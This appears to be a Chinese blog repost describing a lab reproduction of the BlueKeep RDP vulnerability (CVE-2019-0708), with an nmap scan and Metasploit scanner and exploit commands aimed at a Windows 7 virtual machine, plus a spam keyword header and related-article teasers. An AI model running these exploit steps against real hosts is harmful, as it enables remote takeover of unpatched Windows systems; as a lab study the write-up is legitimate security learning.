国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

【漏洞復(fù)現(xiàn)】CVE-2019-0708(BlueKeep)

這篇具有很好參考價(jià)值的文章主要介紹了【漏洞復(fù)現(xiàn)】CVE-2019-0708(BlueKeep)。希望對(duì)大家有所幫助。如果存在錯(cuò)誤或未考慮完全的地方,請(qǐng)大家不吝賜教,您也可以點(diǎn)擊"舉報(bào)違法"按鈕提交疑問(wèn)。

漏洞介紹

2019年5月14日微軟官方發(fā)布安全補(bǔ)丁,修復(fù)了 Windows 遠(yuǎn)程桌面服務(wù)的遠(yuǎn)程代碼執(zhí)行漏洞,該漏洞影響了某些舊版本的 Windows 系統(tǒng)。此漏洞是預(yù)身份驗(yàn)證,無(wú)需用戶交互,這就意味著這個(gè)漏洞可以通過(guò)網(wǎng)絡(luò)蠕蟲的方式被利用,與2017年 WannaCry 勒索病毒的傳播方式類似。

漏洞原理

存在漏洞的遠(yuǎn)程桌面服務(wù)器,在接收到特殊數(shù)據(jù)包時(shí)會(huì)釋放一個(gè)內(nèi)部信道 MS_T120 的控制結(jié)構(gòu)體,但并未將指向該結(jié)構(gòu)體的指針刪除,而且在遠(yuǎn)程桌面連接結(jié)束之后還會(huì)調(diào)用 MS_T120 結(jié)構(gòu)體內(nèi)的一個(gè)函數(shù)指針,若攻擊者可通過(guò)遠(yuǎn)程發(fā)送數(shù)據(jù)重新占據(jù)被釋放的 MS_T120,并為結(jié)構(gòu)體內(nèi)的函數(shù)指針賦恰當(dāng)?shù)闹?,即可?shí)現(xiàn)遠(yuǎn)程命令執(zhí)行。

影響版本

目前已知受影響的 Windows 版本包括但不限于:

Windows 7
Windows Server 2008
Windows Server 2008 R2
Windows Server 2003
Windows XP

Windows 8 和 windows10 以及之后的版本不受此漏洞影響

漏洞復(fù)現(xiàn)

復(fù)現(xiàn)環(huán)境

windows11(本機(jī))192.168.2.51
windows7(虛擬機(jī))192.168.2.44 橋接
kali2022.1(虛擬機(jī))192.168.2.248 橋接

復(fù)現(xiàn)過(guò)程

首先windows7開啟了3389端口,關(guān)閉了防火墻
【漏洞復(fù)現(xiàn)】CVE-2019-0708(BlueKeep)
【漏洞復(fù)現(xiàn)】CVE-2019-0708(BlueKeep)

登錄kali2022.1,用自帶的namp進(jìn)行端口掃描windows7,發(fā)現(xiàn)3389端口開啟

nmap 192.168.2.44

【漏洞復(fù)現(xiàn)】CVE-2019-0708(BlueKeep)
打開msf

msfconsole

【漏洞復(fù)現(xiàn)】CVE-2019-0708(BlueKeep)
查找cve-2019-0708,存在POC和EXP

search cve-2019-0708

【漏洞復(fù)現(xiàn)】CVE-2019-0708(BlueKeep)
先選擇POC判斷漏洞是否存在,確定漏洞存在

use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
set rhosts 192.168.2.44
run

【漏洞復(fù)現(xiàn)】CVE-2019-0708(BlueKeep)
退回

back

【漏洞復(fù)現(xiàn)】CVE-2019-0708(BlueKeep)
使用EXP進(jìn)行攻擊,拿到權(quán)限

use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
set rhosts 192.168.2.44
show options
show targets
set target 5
run

【漏洞復(fù)現(xiàn)】CVE-2019-0708(BlueKeep)
【漏洞復(fù)現(xiàn)】CVE-2019-0708(BlueKeep)文章來(lái)源地址http://www.zghlxwxcb.cn/news/detail-442570.html

到了這里,關(guān)于【漏洞復(fù)現(xiàn)】CVE-2019-0708(BlueKeep)的文章就介紹完了。如果您還想了解更多內(nèi)容,請(qǐng)?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來(lái)自互聯(lián)網(wǎng)用戶投稿,該文觀點(diǎn)僅代表作者本人,不代表本站立場(chǎng)。本站僅提供信息存儲(chǔ)空間服務(wù),不擁有所有權(quán),不承擔(dān)相關(guān)法律責(zé)任。如若轉(zhuǎn)載,請(qǐng)注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實(shí)不符,請(qǐng)點(diǎn)擊違法舉報(bào)進(jìn)行投訴反饋,一經(jīng)查實(shí),立即刪除!

領(lǐng)支付寶紅包贊助服務(wù)器費(fèi)用

相關(guān)文章

  • CVE-2019-11043(PHP遠(yuǎn)程代碼執(zhí)行漏洞)復(fù)現(xiàn)

    CVE-2019-11043(PHP遠(yuǎn)程代碼執(zhí)行漏洞)復(fù)現(xiàn)

    今天繼續(xù)給大家介紹滲透測(cè)試相關(guān)知識(shí),本文主要內(nèi)容是CVE-2019-11043(PHP遠(yuǎn)程代碼執(zhí)行漏洞)復(fù)現(xiàn)。 免責(zé)聲明: 本文所介紹的內(nèi)容僅做學(xué)習(xí)交流使用,嚴(yán)禁利用文中技術(shù)進(jìn)行非法行為,否則造成一切嚴(yán)重后果自負(fù)! 再次強(qiáng)調(diào):嚴(yán)禁對(duì)未授權(quán)設(shè)備進(jìn)行滲透測(cè)試! CVE-2019-11043漏

    2024年02月06日
    瀏覽(22)
  • Docker cp(CVE-2019-14271)漏洞復(fù)現(xiàn)與分析

    目錄 安裝 原理 EXP 參考 如果madison為空,則可以更新阿里鏡像,參考附錄?

    2024年02月13日
    瀏覽(20)
  • 【漏洞復(fù)現(xiàn)】Ruby on Rails 路徑穿越與任意文件讀取漏洞(CVE-2019-5418)

    【漏洞復(fù)現(xiàn)】Ruby on Rails 路徑穿越與任意文件讀取漏洞(CVE-2019-5418)

    1. 漏洞簡(jiǎn)介 Ruby on Rails使用了指定參數(shù)的render file來(lái)渲染應(yīng)用之外的視圖,且會(huì)根據(jù)用戶傳入的Accept頭來(lái)確定文件具體位置。我們可以通過(guò)修改訪問(wèn)某控制器的請(qǐng)求包,通過(guò)…/…/…/…/來(lái)達(dá)到路徑穿越的目的,然后再通過(guò){{來(lái)閉合模板查詢路徑,那我們?cè)L問(wèn)的文件會(huì)被當(dāng)做外部

    2024年02月04日
    瀏覽(31)
  • linux CVE-2019-13272 本地特權(quán)漏洞

    linux CVE-2019-13272 本地特權(quán)漏洞

    在5.1.17之前的Linux內(nèi)核中,kernel / ptrace.c中的ptrace_link錯(cuò)誤地處理了想要?jiǎng)?chuàng)建ptrace關(guān)系的進(jìn)程的憑據(jù)記錄,這允許本地用戶通過(guò)利用父子的某些方案來(lái)獲取root訪問(wèn)權(quán)限 進(jìn)程關(guān)系,父進(jìn)程刪除權(quán)限并調(diào)用execve(可能允許攻擊者控制)。 一個(gè)影響因素是對(duì)象壽命問(wèn)題(也可能導(dǎo)致

    2024年02月08日
    瀏覽(23)
  • CVE漏洞復(fù)現(xiàn)-CVE-2022-22965-Spring-RCE漏洞

    CVE漏洞復(fù)現(xiàn)-CVE-2022-22965-Spring-RCE漏洞

    Spring framework 是Spring 里面的一個(gè)基礎(chǔ)開源框架,其目的是用于簡(jiǎn)化 Java 企業(yè)級(jí)應(yīng)用的開發(fā)難度和開發(fā)周期,2022年3月31日,VMware Tanzu發(fā)布漏洞報(bào)告,Spring Framework存在遠(yuǎn)程代碼執(zhí)行漏洞,在 JDK 9+ 上運(yùn)行的 Spring MVC 或 Spring WebFlux 應(yīng)用程序可能容易受到通過(guò)數(shù)據(jù)綁定的遠(yuǎn)程代碼執(zhí)行

    2023年04月21日
    瀏覽(25)
  • CVE-2022-30887漏洞復(fù)現(xiàn)

    CVE-2022-30887漏洞復(fù)現(xiàn)

    多語(yǔ)言藥房管理系統(tǒng) (MPMS) 是用 PHP 和 MySQL 開發(fā)的, 該軟件的主要目的是在藥房和客戶之間提供一套接口,客戶是該軟件的主要用戶。該軟件有助于為藥房業(yè)務(wù)創(chuàng)建一個(gè)綜合數(shù)據(jù)庫(kù),并根據(jù)到期、產(chǎn)品等各種參數(shù)提供各種報(bào)告。 該CMS中php_action/editProductImage.php存在任意文件上傳

    2023年04月08日
    瀏覽(49)
  • CVE-2016-3088漏洞復(fù)現(xiàn)

    CVE-2016-3088漏洞復(fù)現(xiàn)

    1.背景介紹。 ActiveMQ的web控制臺(tái)分三個(gè)應(yīng)用,admin、api和fileserver,其中admin是管理員頁(yè)面,api是接口,fileserver是儲(chǔ)存文件的接口;admin和api都需要登錄后才能使用,fileserver無(wú)需登錄。 fileserver是一個(gè)RESTful API接口,我們可以通過(guò)GET、PUT、DELETE等HTTP請(qǐng)求對(duì)其中存儲(chǔ)的文件進(jìn)行讀寫

    2023年04月25日
    瀏覽(23)
  • CVE-2015-5254漏洞復(fù)現(xiàn)

    CVE-2015-5254漏洞復(fù)現(xiàn)

    1.漏洞介紹。 Apache ActiveMQ 是美國(guó)阿帕奇(Apache)軟件基金會(huì)所研發(fā)的一套開源的消息中間件,它支持 Java 消息服務(wù),集群,Spring Framework 等。Apache ActiveMQ 5.13.0之前 5.x 版本中存在安全漏洞,該漏洞源于程序沒有限制可在代理中序列化的類。遠(yuǎn)程攻擊者可借助特制的序列化的

    2023年04月24日
    瀏覽(30)
  • CVE-2017-7921漏洞復(fù)現(xiàn)

    CVE-2017-7921漏洞復(fù)現(xiàn)

    0x01 CVE-2017-7921漏洞復(fù)現(xiàn) 許多HikvisionIP攝像機(jī)包含一個(gè)后門,允許未經(jīng)身份驗(yàn)證的模擬任何配置的用戶帳戶。 0x02 漏洞復(fù)現(xiàn): 利用工具發(fā)現(xiàn)漏洞(CVE-2017-7921): 利用路徑:/Security/users?auth=YWRtaW46MTEK 附:檢索所有用戶及其角色的列表 利用路徑:/onvif-http/snapshot?auth=YWRtaW46MTEK 附

    2024年02月12日
    瀏覽(26)
  • 兩個(gè)CVE漏洞復(fù)現(xiàn)

    兩個(gè)CVE漏洞復(fù)現(xiàn)

    2017年6月13日,微軟官方發(fā)布編號(hào)為CVE-2017-8464的漏洞公告,官方介紹Windows系統(tǒng)在解析快捷方式時(shí)存在遠(yuǎn)程執(zhí)行任意代碼的高危漏洞,黑客可以通過(guò)U盤、網(wǎng)絡(luò)共享等途徑觸發(fā)漏洞,完全控制用戶系統(tǒng),安全風(fēng)險(xiǎn)高危 傳播的載體一般是LNK,LNK是windows系統(tǒng)內(nèi)應(yīng)用程序快捷方式文件

    2024年02月10日
    瀏覽(16)

覺得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請(qǐng)作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包